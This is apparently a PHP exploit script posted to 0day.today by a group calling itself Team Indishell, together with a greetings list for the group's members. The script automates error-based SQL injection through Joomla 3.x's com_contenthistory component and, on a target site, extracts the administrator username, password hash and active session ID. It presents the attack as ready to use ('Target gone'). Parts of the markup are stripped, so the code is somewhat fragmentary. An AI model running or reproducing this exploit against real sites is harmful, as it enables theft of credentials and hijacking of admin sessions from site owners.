--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--

--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==-- '; echo $head ; echo '

--==[[ Mannu, Joomla SQL Injection exploiter By Team INDIShEll]]==--

####################################################################################################################################
-==[[Greetz to]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell
Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA
cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
--==[[Love to]]==--
# My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti)
--==[[Interface Desgined By]]==--
GCE College ke DON :D
####################################################################################################################################

'; ?>

", $data); $ar1=explode("", $ar0[1]); $ar=trim($ar1[0]); echo "
"; $v=explode(".",$ar); if($v[0]<=3) { //echo "

Joomla version is 3.*.*"; //echo "
yes yes >:D<, fas gaya billu "; echo "
click below button to exploit it :v

" ; echo ""; echo ""; } else{ echo "joomla version is below 3"; } } if(isset($_POST['sm1'])) { $tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; $dat=data($tar); $ar0=explode("LEFT JOIN", $dat); $ar1=explode("_users", $ar0[1]); $ar=trim($ar1[0]); $rt=str_replace("icalab",$ar,$tar); $tr=data($rt); $ar0=explode("Duplicate entry", $tr); $ar1=explode("for key", $ar0[1]); $rt2=str_replace("password","username,0x7e",$rt); $tr2=data($rt2); $ar2=explode("Duplicate entry", $tr2); $ar3=explode("for key", $ar2[1]); if($ar3[0]!='' && $ar1[0]!='') { echo "

Target gone 8-)

website name:- ".$_POST['tar']."
-------------------------------

"; echo "username is --> ".str_replace("~1","",trim($ar3[0]))."
Password Hash is --> ".str_replace("~1","",trim($ar1[0])); echo "
Admin session ID is

"; $sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; $ses=data($sessionid); $ar0=explode("Duplicate entry", $ses); $ar1=explode("for key", $ar0[1]); echo trim($ar1[0]); } } ?> # 0day.today [2018-02-18] #

Query Builder